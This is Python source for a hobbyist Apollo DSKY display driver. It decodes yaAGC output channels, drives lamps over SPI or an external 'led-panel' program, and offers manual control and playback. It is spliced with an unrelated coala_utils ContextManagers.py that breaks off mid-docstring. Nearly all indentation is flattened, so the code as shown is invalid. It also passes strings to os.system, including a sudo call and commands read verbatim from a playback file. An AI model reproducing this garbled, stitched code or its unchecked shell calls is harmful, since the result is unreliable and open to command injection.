"9 KEY" : { "isLit" : useBacklights, "cliParameter" : "R", "spiParameters" : [ { "register":6, "mask":0x80 } ] },
"6 KEY" : { "isLit" : useBacklights, "cliParameter" : "S", "spiParameters" : [ { "register":7, "mask":0x08 } ] },
"3 KEY" : { "isLit" : useBacklights, "cliParameter" : "T", "spiParameters" : [ { "register":7, "mask":0x80 } ] },
"CLR KEY" : { "isLit" : useBacklights, "cliParameter" : "U", "spiParameters" : [ { "register":8, "mask":0x40 } ] },
"PRO KEY" : { "isLit" : useBacklights, "cliParameter" : "V", "spiParameters" : [ { "register":8, "mask":0x20 } ] },
"KEY REL KEY" : { "isLit" : useBacklights, "cliParameter" : "W", "spiParameters" : [ { "register":8, "mask":0x10 } ] },
"ENTR KEY" : { "isLit" : useBacklights, "cliParameter" : "X", "spiParameters" : [ { "register":8, "mask":0x08 } ] },
"RSET KEY" : { "isLit" : useBacklights, "cliParameter" : "Y", "spiParameters" : [ { "register":8, "mask":0x04 } ] },
"VNCSERVERUI" : { "isLit" : False, "cliParameter" : "Z", "spiParameters" : [ { "register":8, "mask":0x02 } ] },
"TBD1" : { "isLit" : False, "cliParameter" : "a", "spiParameters" : [ { "register":8, "mask":0x01 } ] },
"TBD2" : { "isLit" : False, "cliParameter" : "b", "spiParameters" : [ { "register":8, "mask":0x80 } ] }
}
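# Worked example (illustrative): if only "TEMP" is lit, its spiParameters entry
# { "register":1, "mask":0x07 } causes updateLamps() below to OR 0x07 into ledArray[0]
# and issue the single SPI write writeSpi(1, 0x07), i.e. segments e/f/g of the chip's
# DIGIT0.  In the non-pigpio path the same lamp instead contributes its cliParameter
# "2" to the argument string handed to the external 'led-panel' program.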
#lampCliStringDefault = "GHIJKLMNOPQRSTUVWXY"
lampCliStringDefault = ""
lampCliByte = b""
lastLampCliString = ""
def updateLampStatuses(key, value):
global lampStatuses
if key in lampStatuses:
lampStatuses[key]["isLit"] = value
def flushLampUpdates(lampCliString):
global lastLampCliString
lastLampCliString = lampCliString
os.system("sudo ./led-panel '" + lampCliString + "' &")
lampExecCheckCount = 0
lampUpdateTimer = threading.Timer(lampDeadtime, flushLampUpdates)
lastLedArray = [ 0, 0, 0, 0, 0, 0, 0, 0 ]
def updateLamps():
global lastLedArray
if args.pigpio:
# For directly accessing LED-controller chip via
# SPI bus using PIGPIO library.
# First step, determine what all bits need to be set in the chip's
# digit registers.
ledArray = [ 0, 0, 0, 0, 0, 0, 0, 0 ]
for key in lampStatuses:
if lampStatuses[key]["isLit"]:
parameters = lampStatuses[key]["spiParameters"]
for i in range(0, len(parameters)):
# Note that all the address fields should be 1..8.
ledArray[parameters[i]["register"] - 1] |= parameters[i]["mask"]
# Write out the registers that have changed.
for i in range(0,8):
if ledArray[i] != lastLedArray[i]:
#print("write SPI " + str(1 + i) + " <- " + hex(ledArray[i]))
writeSpi(i + 1, ledArray[i])
lastLedArray[i] = ledArray[i]
else:
# For shelling out to 'led-panel' program.
global lampUpdateTimer, lampExecCheckCount
global lastLampCliString
# First step, determine what led-panel's CLI parameter string will be.
lampCliString = ""
for key in lampStatuses:
if lampStatuses[key]["isLit"]:
lampCliString += lampStatuses[key]["cliParameter"]
lampCliString += lampCliStringDefault
# If unchanged, do nothing.
if lampCliString == lastLampCliString:
return
lampCliByte = lampCliString.ljust(14,'x').encode()
# Have to determine if led-panel is still running from before, in
# which case we can't start it again and have to retry later.
lampExecCheckCount += 1
lampUpdateTimer.cancel()
ledPanelRunning = False
for proc in psutil.process_iter():
try:
info = proc.as_dict(attrs=['name'])
if "led-panel" in info['name']:
ledPanelRunning = True
break
except psutil.NoSuchProcess:
pass
if ledPanelRunning:
print("Delaying lamp flush to avoid overlap ...")
lampExecCheckCount = 0
lampUpdateTimer = threading.Timer(lampDeadtime, updateLamps)
lampUpdateTimer.start()
return
if lampExecCheckCount < 2:
lampUpdateTimer = threading.Timer(lampDeadtime, updateLamps)
lampUpdateTimer.start()
return
lampExecCheckCount = 0
# Send lamp codes to Alarm Panel (Vlad Mihailescu)
ser_alarm.write(lampCliByte)
ser_alarm.flush()
# Everything is swell, so run 'led-panel'.
flushLampUpdates(lampCliString)
def updateLampStatusesAndLamps(key, value):
#sys.stderr.write("BL " + key + " " + oct(value) + "\n")
updateLampStatuses(key, value)
updateLamps()
def backlightOn():
for key in lampStatuses:
if key[-3:] == "KEY":
updateLampStatuses(key, True)
updateLamps()
def backlightOff():
for key in lampStatuses:
if key[-3:] == "KEY":
updateLampStatuses(key, False)
updateLamps()
def everythingOff():
for key in lampStatuses:
updateLampStatuses(key, False)
updateLamps()
displayGraphic(0, 0, imageCompActyOff)
displayGraphic(colPN, topProg, imageDigitBlank)
displayGraphic(colPN + digitWidth, topProg, imageDigitBlank)
displayGraphic(0, topVN, imageDigitBlank)
displayGraphic(digitWidth, topVN, imageDigitBlank)
displayGraphic(colPN, topVN, imageDigitBlank)
displayGraphic(colPN + digitWidth, topVN, imageDigitBlank)
displayGraphic(colSign, topR1, imagePlusMinusOff)
displayGraphic(colD1, topR1, imageDigitBlank)
displayGraphic(colD2, topR1, imageDigitBlank)
displayGraphic(colD3, topR1, imageDigitBlank)
displayGraphic(colD4, topR1, imageDigitBlank)
displayGraphic(colD5, topR1, imageDigitBlank)
displayGraphic(colSign, topR2, imagePlusMinusOff)
displayGraphic(colD1, topR2, imageDigitBlank)
displayGraphic(colD2, topR2, imageDigitBlank)
displayGraphic(colD3, topR2, imageDigitBlank)
displayGraphic(colD4, topR2, imageDigitBlank)
displayGraphic(colD5, topR2, imageDigitBlank)
displayGraphic(colSign, topR3, imagePlusMinusOff)
displayGraphic(colD1, topR3, imageDigitBlank)
displayGraphic(colD2, topR3, imageDigitBlank)
displayGraphic(colD3, topR3, imageDigitBlank)
displayGraphic(colD4, topR3, imageDigitBlank)
displayGraphic(colD5, topR3, imageDigitBlank)
everythingOff()
# This checks to see if vncserverui is running, and turns on a lamp if so.
vncCheckTimer = ""
def checkForVncserver():
global vncCheckTimer
vncserveruiFound = False
for proc in psutil.process_iter():
try:
info = proc.as_dict(attrs=['name'])
if "vncserverui" in info['name']:
vncserveruiFound = True
break
except psutil.NoSuchProcess:
pass
updateLampStatuses("VNCSERVERUI", vncserveruiFound)
updateLamps()
vncCheckTimer = threading.Timer(10, checkForVncserver)
vncCheckTimer.start()
checkForVncserver()
def timersStop():
global vnTimer, lampUpdateTimer, vncCheckTimer
print("Canceling all timers ...")
if vnTimer != "":
vnTimer.cancel()
if lampUpdateTimer != "":
lampUpdateTimer.cancel()
if vncCheckTimer != "":
vncCheckTimer.cancel()
# This function is called by the event loop only when yaAGC has written
# to an output channel. The function should do whatever it is that needs to be done
# with this output data, which is not processed additionally in any way by the
# generic portion of the program. As a test, I simply display the outputs for
# those channels relevant to the DSKY.
lastInputChannels = {
"0o10-1" : 1234567,
"0o10-2" : 1234567,
"0o10-3" : 1234567,
"0o10-4" : 1234567,
"0o10-5" : 1234567,
"0o10-6" : 1234567,
"0o10-7" : 1234567,
"0o10-8" : 1234567,
"0o10-9" : 1234567,
"0o10-10" : 1234567,
"0o10-11" : 1234567,
"0o10-12" : 1234567,
"0o11" : 1234567,
"0o13" : 1234567,
"0o163" : 1234567,
"0o15" : 1234567,
"0o32" : 1234567
}
plusMinusState1 = 0
plusMinusState2 = 0
plusMinusState3 = 0
lastKeyRel = ""
def outputFromAGC(channel, value):
# These lastInputChannels[] values are just used to avoid time-consuming redoing
# of operations which aren't actual changes; cuts down on debugging messages
# as well
global lastInputChannels, plusMinusState1, plusMinusState2, plusMinusState3
global vnFlashing, vnTimer, vnCurrentlyOn, vnImage1, vnImage2, vnImage3, vnImage4, vnTestOverride
global lastKeyRel
rawChannelValue = value
if channel == 0o10:
relay = (value >> 11) & 0o17
channelName = "0o10-" + str(relay)
value &= 0o3777
if relay < 1 or relay > 12:
return
elif channel == 0o11:
channelName = "0o11"
value &= 0x2E
elif channel == 0o13:
channelName = "0o13"
value &= 0x200
elif channel == 0o163:
channelName = "0o163"
value &= 0o720
else:
return
if (channelName in lastInputChannels) and lastInputChannels[channelName] == value:
return
lastInputChannels[channelName] = value
value = rawChannelValue
if args.record:
global lastRecordedTime
currentTime = time.time()
if lastRecordedTime < 0:
lastRecordedTime = currentTime
try:
#recordingFile.write("lastInputChannels[\"" + channelName + "\"] = " + oct(lastInputChannels[channelName]) + "\n")
recordingFile.write(str(round(1000 * (currentTime - lastRecordedTime))) + " " + ("%o" % channel) + " " + ("%o" % value) + "\n")
except:
pass
lastRecordedTime = currentTime
if channel == 0o10:
aaaa = relay
b = (value >> 10) & 0x01
ccccc = (value >> 5) & 0x1F
ddddd = value & 0x1F
if aaaa != 12:
sc,ic = codeToString(ccccc)
sd,id = codeToString(ddddd)
if aaaa == 11:
print(sc + " -> M1 " + sd + " -> M2")
displayGraphic(colPN, topProg, ic)
displayGraphic(colPN + digitWidth, topProg, id)
elif aaaa == 10:
print(sc + " -> V1 " + sd + " -> V2")
vnImage1 = ic
vnImage2 = id
displayGraphic(0, topVN, ic)
displayGraphic(digitWidth, topVN, id)
elif aaaa == 9:
print(sc + " -> N1 " + sd + " -> N2")
vnImage3 = ic
vnImage4 = id
displayGraphic(colPN, topVN, ic)
displayGraphic(colPN + digitWidth, topVN, id)
elif aaaa == 8:
print(" " + sd + " -> 11")
displayGraphic(colD1, topR1, id)
elif aaaa == 7:
plusMinus = " "
if b != 0:
plusMinus = "1+"
plusMinusState1 |= 1
else:
plusMinusState1 &= ~1
displaySign(colSign, topR1, plusMinusState1)
print(sc + " -> 12 " + sd + " -> 13 " + plusMinus)
displayGraphic(colD2, topR1, ic)
displayGraphic(colD3, topR1, id)
elif aaaa == 6:
plusMinus = " "
if b != 0:
plusMinus = "1-"
plusMinusState1 |= 2
else:
plusMinusState1 &= ~2
displaySign(colSign, topR1, plusMinusState1)
print(sc + " -> 14 " + sd + " -> 15 " + plusMinus)
displayGraphic(colD4, topR1, ic)
displayGraphic(colD5, topR1, id)
elif aaaa == 5:
plusMinus = " "
if b != 0:
plusMinus = "2+"
plusMinusState2 |= 1
else:
plusMinusState2 &= ~1
displaySign(colSign, topR2, plusMinusState2)
print(sc + " -> 21 " + sd + " -> 22 " + plusMinus)
displayGraphic(colD1, topR2, ic)
displayGraphic(colD2, topR2, id)
elif aaaa == 4:
plusMinus = " "
if b != 0:
plusMinus = "2-"
plusMinusState2 |= 2
else:
plusMinusState2 &= ~2
displaySign(colSign, topR2, plusMinusState2)
print(sc + " -> 23 " + sd + " -> 24 " + plusMinus)
displayGraphic(colD3, topR2, ic)
displayGraphic(colD4, topR2, id)
elif aaaa == 3:
print(sc + " -> 25 " + sd + " -> 31")
displayGraphic(colD5, topR2, ic)
displayGraphic(colD1, topR3, id)
elif aaaa == 2:
plusMinus = " "
if b != 0:
plusMinus = "3+"
plusMinusState3 |= 1
else:
plusMinusState3 &= ~1
displaySign(colSign, topR3, plusMinusState3)
print(sc + " -> 32 " + sd + " -> 33 " + plusMinus)
displayGraphic(colD2, topR3, ic)
displayGraphic(colD3, topR3, id)
elif aaaa == 1:
plusMinus = " "
if b != 0:
plusMinus = "3-"
plusMinusState3 |= 2
else:
plusMinusState3 &= ~2
displaySign(colSign, topR3, plusMinusState3)
print(sc + " -> 34 " + sd + " -> 35 " + plusMinus)
displayGraphic(colD4, topR3, ic)
displayGraphic(colD5, topR3, id)
elif aaaa == 12:
vel = "VEL OFF "
if (value & 0x04) != 0:
vel = "VEL ON "
updateLampStatuses("VEL", True)
else:
updateLampStatuses("VEL", False)
noAtt = "NO ATT OFF "
if (value & 0x08) != 0:
noAtt = "NO ATT ON "
updateLampStatuses("NO ATT", True)
else:
updateLampStatuses("NO ATT", False)
alt = "ALT OFF "
if (value & 0x10) != 0:
alt = "ALT ON "
updateLampStatuses("ALT", True)
else:
updateLampStatuses("ALT", False)
gimbalLock = "GIMBAL LOCK OFF "
if (value & 0x20) != 0:
gimbalLock = "GIMBAL LOCK ON "
updateLampStatuses("GIMBAL LOCK", True)
else:
updateLampStatuses("GIMBAL LOCK", False)
tracker = "TRACKER OFF "
if (value & 0x80) != 0:
tracker = "TRACKER ON "
updateLampStatuses("TRACKER", True)
else:
updateLampStatuses("TRACKER", False)
prog = "PROG OFF "
if (value & 0x100) != 0:
prog = "PROG ON "
updateLampStatuses("PROG", True)
else:
updateLampStatuses("PROG", False)
print(vel + " " + noAtt + " " + alt + " " + gimbalLock + " " + tracker + " " + prog)
updateLamps()
elif channel == 0o11:
compActy = "COMP ACTY OFF "
if (value & 0x02) != 0:
compActy = "COMP ACTY ON "
displayGraphic(0, 0, imageCompActyOn)
#ser_disp.write(b'cal.bco=' + turnON + eof)
else:
displayGraphic(0, 0, imageCompActyOff)
#ser_disp.write(b'cal.bco=' + turnOFF + eof)
uplinkActy = "UPLINK ACTY OFF "
if (value & 0x04) != 0:
uplinkActy = "UPLINK ACTY ON "
updateLampStatuses("UPLINK ACTY", True)
else:
updateLampStatuses("UPLINK ACTY", False)
flashing = "V/N NO FLASH "
if (value & 0x20) != 0:
if not vnFlashing:
vnFlashing = True
vnCurrentlyOn = True
vnTimer = threading.Timer(0.75, vnFlashingHandler)
vnTimer.start()
flashing = "V/N FLASH "
else:
if vnFlashing != False:
vnFlashingStop()
print(compActy + " " + uplinkActy + " " + " " + " " + flashing)
updateLamps()
elif channel == 0o13:
test = "DSKY TEST "
if (value & 0x200) == 0:
test = "DSKY NO TEST "
print(test)
updateLamps()
elif channel == 0o163:
if (value & 0x08) != 0:
temp = "TEMP ON "
updateLampStatuses("TEMP", True)
else:
temp = "TEMP OFF "
updateLampStatuses("TEMP", False)
if (value & 0o400) != 0:
standby = "DSKY STANDBY ON "
updateLampStatuses("DSKY STANDBY", True)
else:
standby = "DSKY STANDBY OFF"
updateLampStatuses("DSKY STANDBY", False)
if (value & 0o20) != 0:
keyRel = "KEY REL ON "
updateLampStatuses("KEY REL", True)
else:
keyRel = "KEY REL OFF "
updateLampStatuses("KEY REL", False)
if (value & 0o100) != 0:
oprErr = "OPR ERR ON "
updateLampStatuses("OPR ERR", True)
else:
oprErr = "OPR ERR OFF "
updateLampStatuses("OPR ERR", False)
if (value & 0o200) != 0:
restart = "RESTART ON "
updateLampStatuses("RESTART", True)
else:
restart = "RESTART OFF "
updateLampStatuses("RESTART", False)
print(temp + " " + standby + " " + keyRel + " " + oprErr + " " + restart)
updateLamps()
else:
print("Received from yaAGC: " + oct(value) + " -> channel " + oct(channel))
return
###################################################################################
# Lamp test
if args.lamptest:
print("Turning on all lamps ...")
for key in lampStatuses:
updateLampStatuses(key, True)
updateLamps()
print("Wait for 10 seconds ...")
time.sleep(10)
print("Turning off all lamps ...")
for key in lampStatuses:
updateLampStatuses(key, False)
updateLamps()
print("Exiting lamp test ...")
echoOn(True)
timersStop()
root.destroy()
shutdownGPIO()
os.system("xset r on &")
os._exit(0)
###################################################################################
# Direct manual control of the lamps and numerical registers.
if args.manual:
print("Direct manual control ...")
everythingOff()
def manualControl():
# The state variable determines how an input key is interpreted.
# The state consists of two parts, AREA and OFFSET, where AREA is
# 0 No area selected
# 1 PROG area
# 2 VERB area
# 3 NOUN area
# 4 R1 area
# 5 R2 area
# 6 R3 area
# 7 Lamp area
# 8 Key-backlight area
# (COMP ACTY has no AREA associated with it.)
# The OFFSET is the position within the AREA, with 0 being
# the leftmost. For the lamp area, 0 is the upper left,
# 1 the upper right, and so on, down to 13 for the lower right.
# For the key-backlight area, the order is from upper left
# downward, and then to the right: VERB NOUN + - 0 7 4 1 ....
stateAREA = 0
stateOFFSET = 0
compActy = False
stateBuffer = [
[],
[ 'c', 'c' ],
[ 'c', 'c' ],
[ 'c', 'c' ],
[ 'c', 'c', 'c', 'c', 'c', 'c' ],
[ 'c', 'c', 'c', 'c', 'c', 'c' ],
[ 'c', 'c', 'c', 'c', 'c', 'c' ],
[ '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0' ],
[ '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0' ]
]
statePrefix = [ '', 'p', 'v', 'n', 'a', 'b', 'c', 'l', 'k' ]
while True:
ch = getKey()
if ch == "":
continue
if ch == 'R':
name = ''
for i in range(1, len(statePrefix)):
name += statePrefix[i]
for j in range(0, len(stateBuffer[i])):
name += stateBuffer[i][j]
if compActy:
name += "C"
else:
name += "c"
name += ".png"
screenshot(homeDir + '/' + name)
if stateAREA == 0:
stateOFFSET = 0
if ch == 'R':
					break
elif ch == 'P':
stateAREA = 1
elif ch == 'V':
stateAREA = 2
elif ch == 'N':
stateAREA = 3
elif ch == '1':
stateAREA = 4
elif ch == '2':
stateAREA = 5
elif ch == '3':
stateAREA = 6
elif ch == '+':
stateAREA = 7
elif ch == '-':
stateAREA = 8
elif ch == 'C':
compActy = not compActy
if compActy:
displayGraphic(0, 0, imageCompActyOn)
else:
displayGraphic(0, 0, imageCompActyOff)
elif stateAREA >= 1 and stateAREA <= 6: # Numerical areas
if stateAREA == 1:
row = topProg
col = colPN + stateOFFSET * digitWidth
digits = 2
elif stateAREA == 2:
row = topVN
col = stateOFFSET * digitWidth
digits = 2
elif stateAREA == 3:
row = topVN
col = colPN + stateOFFSET * digitWidth
digits = 2
elif stateAREA == 4 or stateAREA == 5 or stateAREA == 6:
if stateAREA == 4:
row = topR1
elif stateAREA == 5:
row = topR2
else:
row = topR3
if stateOFFSET == 0:
col = colSign
else:
col = colD1 + (stateOFFSET - 1) * digitWidth
digits = 6
if ch == "K":
if stateOFFSET > 0:
stateOFFSET -= 1
elif ch == "E" or ch == "\n":
stateAREA = 0
elif ch == "P":
stateAREA = 1
stateOFFSET = 0
elif ch == "V":
stateAREA = 2
stateOFFSET = 0
elif ch == "N":
stateAREA = 3
stateOFFSET = 0
elif stateOFFSET >= digits:
continue
elif stateOFFSET == 0 and digits == 6:
if ch == "C":
displayGraphic(col, row, imagePlusMinusOff)
elif ch == "+":
displayGraphic(col, row, imagePlusOn)
elif ch == "-":
displayGraphic(col, row, imageMinusOn)
else:
continue
stateBuffer[stateAREA][stateOFFSET] = ch
stateOFFSET += 1
else:
if ch == "C":
displayGraphic(col, row, imageDigitBlank)
elif ch == "0":
displayGraphic(col, row, imageDigit0)
elif ch == "1":
displayGraphic(col, row, imageDigit1)
elif ch == "2":
displayGraphic(col, row, imageDigit2)
elif ch == "3":
displayGraphic(col, row, imageDigit3)
elif ch == "4":
displayGraphic(col, row, imageDigit4)
elif ch == "5":
displayGraphic(col, row, imageDigit5)
elif ch == "6":
displayGraphic(col, row, imageDigit6)
elif ch == "7":
displayGraphic(col, row, imageDigit7)
elif ch == "8":
displayGraphic(col, row, imageDigit8)
elif ch == "9":
displayGraphic(col, row, imageDigit9)
else:
continue
stateBuffer[stateAREA][stateOFFSET] = ch
stateOFFSET += 1
elif stateAREA == 7: # Lamp area
lampNames = [ "UPLINK ACTY", "TEMP", "NO ATT", "GIMBAL LOCK",
"DSKY STANDBY", "PROG", "KEY REL", "RESTART",
"OPR ERR", "TRACKER", "PRIO DSP","ALT",
"NO DAP", "VEL" ]
if ch == "E" or ch == "\n":
stateAREA = 0
elif ch == "P":
stateAREA = 1
stateOFFSET = 0
elif ch == "V":
stateAREA = 2
stateOFFSET = 0
elif ch == "N":
stateAREA = 3
stateOFFSET = 0
elif ch == "K":
if stateOFFSET > 0:
stateOFFSET -= 1
elif stateOFFSET >= len(lampNames):
continue
elif ch == "-":
updateLampStatuses(lampNames[stateOFFSET], False)
updateLamps()
stateBuffer[stateAREA][stateOFFSET] = ch
stateOFFSET += 1
elif ch == "+":
updateLampStatuses(lampNames[stateOFFSET], True)
updateLamps()
stateBuffer[stateAREA][stateOFFSET] = ch
stateOFFSET += 1
elif stateAREA == 8: # Key-backlight area
keyNames = [ "VERB KEY", "NOUN KEY",
"+ KEY", "- KEY", "0 KEY", "7 KEY",
"4 KEY", "1 KEY", "8 KEY", "5 KEY",
"2 KEY", "9 KEY", "6 KEY", "3 KEY",
"CLR KEY", "PRO KEY", "KEY REL KEY", "ENTR KEY",
"RSET KEY", "VNCSERVERUI", "TBD1", "TBD2" ]
if ch == "E" or ch == "\n":
stateAREA = 0
elif ch == "P":
stateAREA = 1
stateOFFSET = 0
elif ch == "V":
stateAREA = 2
stateOFFSET = 0
elif ch == "N":
stateAREA = 3
stateOFFSET = 0
elif ch == "K":
if stateOFFSET > 0:
stateOFFSET -= 1
elif stateOFFSET >= len(keyNames):
continue
elif ch == "-":
updateLampStatuses(keyNames[stateOFFSET], False)
updateLamps()
stateBuffer[stateAREA][stateOFFSET] = ch
stateOFFSET += 1
elif ch == "+":
updateLampStatuses(keyNames[stateOFFSET], True)
updateLamps()
stateBuffer[stateAREA][stateOFFSET] = ch
stateOFFSET += 1
else:
stateAREA = 0
print("Exiting manual control ...")
everythingOff()
echoOn(True)
timersStop()
root.destroy()
shutdownGPIO()
os.system("xset r on &")
os._exit(0)
manualThread = threading.Thread(target=manualControl)
manualThread.start()
root.mainloop()
os._exit(0)
###################################################################################
# Generic initialization (TCP socket setup). Has no target-specific code, and
# shouldn't need to be modified unless there are bugs.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setblocking(0)
def connectToAGC():
count = 0
sys.stderr.write("Connecting to AGC " + TCP_IP + ":" + str(TCP_PORT) + "\n")
while True:
try:
s.connect((TCP_IP, TCP_PORT))
sys.stderr.write("Connected.\n")
break
except socket.error as msg:
sys.stderr.write(str(msg) + "\n")
count += 1
if count >= 10:
sys.stderr.write("Too many retries ...\n")
time.sleep(3)
echoOn(True)
os._exit(1)
time.sleep(1)
# The following provides a clean exit from the program by simply
# hitting any key. However if get_char_keyboard_nonblock isn't
# defined, just delete the next 4 lines and use Ctrl-C to exit instead.
ch = get_char_keyboard_nonblock()
if ch != "":
				sys.stderr.write("Exiting ...\n")
echoOn(True)
shutdownGPIO()
os._exit(1)
if args.playback:
pass
else:
connectToAGC()
if useBacklights:
backlightOn()
###################################################################################
# Event loop. Just check periodically for output from yaAGC (in which case the
# user-defined callback function outputFromAGC is executed) or data in the
# user-defined function inputsForAGC (in which case a message is sent to yaAGC).
# But this section has no target-specific code, and shouldn't need to be modified
# unless there are bugs.
keyNames = [
"none", "1 KEY", "2 KEY", "3 KEY", "4 KEY",
"5 KEY", "6 KEY", "7 KEY", "8 KEY", "9 KEY",
"none", "none", "none", "none", "none",
"none", "0 KEY", "VERB KEY", "RSET KEY", "none",
"none", "none", "none", "none", "none",
"KEY REL KEY", "+ KEY", "- KEY", "ENTR KEY", "none",
"CLR KEY", "NOUN KEY"
]
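# Note: keyNames is indexed by the 5-bit keycode read from AGC input channel 015
# (see the "keyNames[value & 0o37]" lookup in eventLoop() below); codes that do
# not correspond to a DSKY key are listed as "none".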
def eventLoop():
global debugKey
# Buffer for a packet received from yaAGC.
packetSize = 4
inputBuffer = bytearray(packetSize)
leftToRead = packetSize
view = memoryview(inputBuffer)
cannedRsetCount = 0
didSomething = False
while True:
if not didSomething:
time.sleep(PULSE)
didSomething = False
# Check for packet data received from yaAGC and process it.
		# While these packets are always exactly 4 bytes long, the socket is
		# non-blocking, so any individual read may yield fewer bytes than that;
		# the buffer therefore accumulates data across reads until it fills.
if args.playback:
global currentPlaybackIndex, playbackEvents, lastPlaybackTime
# Get data from playback file.
if currentPlaybackIndex < len(playbackEvents):
#print(currentPlaybackIndex)
timeNow = time.time()
desiredTime = lastPlaybackTime + playbackEvents[currentPlaybackIndex][1] / 1000.0
if timeNow >= desiredTime:
lastPlaybackTime = desiredTime
#print(playbackEvents[currentPlaybackIndex])
if playbackEvents[currentPlaybackIndex][0]:
# Channels 015 and 032 are AGC INPUT channels (hence
# are outputs from the DSKY rather than inputs to it).
# They indicate keypresses. We won't do anything with
# them other than possibly to flash backlights on the
# associated keys.
channel = playbackEvents[currentPlaybackIndex][2]
value = playbackEvents[currentPlaybackIndex][3]
if channel == 0o15:
#print("Playback keystroke event " + oct(channel) + " " + oct(value))
name = keyNames[value & 0o37]
if name == "RSET KEY":
cannedRsetCount += 1
if cannedRsetCount >= 5:
echoOn(True)
timersStop()
root.destroy()
shutdownGPIO()
os.system("xset r on &")
return
else:
								cannedRsetCount = 0
updateLampStatusesAndLamps(name, False)
t = threading.Timer(0.32, updateLampStatusesAndLamps, (name, True))
t.start()
elif channel == 0o32:
if (value & 0o20000) != 0:
updateLampStatusesAndLamps("PRO KEY", True)
else:
updateLampStatusesAndLamps("PRO KEY", False)
else:
outputFromAGC(channel, value)
else:
sys.stderr.write("Command = \"" + playbackEvents[currentPlaybackIndex][2] + "\"\n")
os.system(playbackEvents[currentPlaybackIndex][2] + ' &')
currentPlaybackIndex += 1
didSomething = True
else:
# Get input from socket to AGC.
try:
numNewBytes = s.recv_into(view, leftToRead)
except:
numNewBytes = 0
if numNewBytes > 0:
view = view[numNewBytes:]
leftToRead -= numNewBytes
if leftToRead == 0:
# Prepare for next read attempt.
view = memoryview(inputBuffer)
leftToRead = packetSize
# Parse the packet just read, and call outputFromAGC().
# Start with a sanity check.
ok = 1
if (inputBuffer[0] & 0xF0) != 0x00:
ok = 0
elif (inputBuffer[1] & 0xC0) != 0x40:
ok = 0
elif (inputBuffer[2] & 0xC0) != 0x80:
ok = 0
elif (inputBuffer[3] & 0xC0) != 0xC0:
ok = 0
# Packet has the various signatures we expect.
if ok == 0:
# Note that, depending on the yaAGC version, it occasionally
# sends either a 1-byte packet (just 0xFF, older versions)
# or a 4-byte packet (0xFF 0xFF 0xFF 0xFF, newer versions)
# just for pinging the client. These packets hold no
						# data and need to be ignored, but for other corrupted packets
						# we print a message and then try to realign past the corrupted
						# bytes.
						if inputBuffer[0] != 0xff or inputBuffer[1] != 0xff or inputBuffer[2] != 0xff or inputBuffer[3] != 0xff:
if inputBuffer[0] != 0xff:
print("Illegal packet: " + hex(inputBuffer[0]) + " " + hex(inputBuffer[1]) + " " + hex(inputBuffer[2]) + " " + hex(inputBuffer[3]))
for i in range(1,packetSize):
if (inputBuffer[i] & 0xF0) == 0:
j = 0
for k in range(i,4):
inputBuffer[j] = inputBuffer[k]
j += 1
view = view[j:]
leftToRead = packetSize - j
else:
channel = (inputBuffer[0] & 0x0F) << 3
channel |= (inputBuffer[1] & 0x38) >> 3
value = (inputBuffer[1] & 0x07) << 12
value |= (inputBuffer[2] & 0x3F) << 6
value |= (inputBuffer[3] & 0x3F)
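						# Worked example of the decoding above: the 4-byte packet
						# 0x01 0x40 0x9F 0xFF carries channel 0o10 with value 0o3777.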
outputFromAGC(channel, value)
didSomething = True
# Check for locally-generated data for which we must generate messages
# to yaAGC over the socket. In theory, the externalData list could contain
# any number of channel operations, but in practice (at least for something
# like a DSKY implementation) it will actually contain only 0 or 1 operations.
externalData = inputsForAGC()
if externalData == "":
echoOn(True)
timersStop()
screenshot(homeDir + "/lastscrn.png")
root.destroy()
shutdownGPIO()
os.system("xset r on &")
return
for i in range(0, len(externalData)):
packetize(externalData[i])
didSomething = True
if debugKey != "":
print("GUI key = " + debugKey)
debugKey = ""
eventLoopThread = threading.Thread(target=eventLoop)
eventLoopThread.start()
root.mainloop()
shutdownGPIO()
os._exit(0)
|
ContextManagers.py
|
import builtins
import os
import platform
import signal
import sys
import tempfile
import threading
from contextlib import closing, contextmanager
from io import StringIO
from coala_utils.MutableValue import MutableValue
@contextmanager
def subprocess_timeout(sub_process, seconds, kill_pg=False):
"""
    Kill the subprocess if it takes more than the timeout.
:param sub_process: The sub process to run.
:param seconds: The number of seconds to allow the test to run for. If
set to 0 or a negative value, it waits indefinitely.
Floats can be used to specify units smaller than
seconds.
:param kill_pg: Boolean whether to kill the process group or only this
process. (not applicable for windows)
"""
timedout = MutableValue(False)
if seconds <= 0:
yield timedout
return
finished = threading.Event()
if platform.system() == "Windows": # pragma: no cover
kill_pg = False
def kill_it():
finished.wait(seconds)
if not finished.is_set():
timedout.value = True
if kill_pg:
pgid = os.getpgid(sub_process.pid)
os.kill(sub_process.pid, signal.SIGINT)
if kill_pg:
os.killpg(pgid, signal.SIGINT)
thread = threading.Thread(name='timeout-killer', target=kill_it)
try:
thread.start()
yield timedout
finally:
finished.set()
thread.join()
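# Illustrative usage (assuming ``proc`` is a ``subprocess.Popen`` object):
#
#     with subprocess_timeout(proc, 5) as timedout:
#         proc.communicate()
#     if timedout.value:
#         ...  # proc was sent SIGINT after exceeding the 5 second timeout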
@contextmanager
def replace_stdout(replacement):
"""
Replaces stdout with the replacement, yields back to the caller and then
reverts everything back.
"""
_stdout = sys.stdout
sys.stdout = replacement
try:
yield
finally:
sys.stdout = _stdout
@contextmanager
def replace_stderr(replacement):
"""
Replaces stderr with the replacement, yields back to the caller and then
reverts everything back.
"""
_stderr = sys.stderr
sys.stderr = replacement
try:
yield
finally:
sys.stderr = _stderr
@contextmanager
def suppress_stdout():
"""
Suppresses everything going to stdout.
"""
with open(os.devnull, "w") as devnull, replace_stdout(devnull):
yield
@contextmanager
def retrieve_stdout():
"""
Yields a StringIO object from which one can read everything that was
printed to stdout. (It won't be printed to the real stdout!)
Example usage:
with retrieve_stdout() as stdout:
print("something") # Won't print to the console
what_was_printed = stdout.getvalue() # Save the value
"""
with closing(StringIO()) as sio, replace_stdout(sio):
oldprint = builtins.print
try:
            # Merely replacing sys.stdout doesn't affect libraries that already
            # cached a reference to print/stdout; overriding builtins.print makes
            # sure even those end up writing to ``sio``. Well... it works.
def newprint(*args, **kwargs):
kwargs['file'] = sio
oldprint(*args, **kwargs)
builtins.print = newprint
yield sio
finally:
builtins.print = oldprint
@contextmanager
def retrieve_stderr():
"""
Yields a StringIO object from which one can read everything that was
printed to stderr. (It won't be printed to the real stderr!)
Example usage:
with retrieve_stderr() as stderr:
print("something") # Won't print to the console
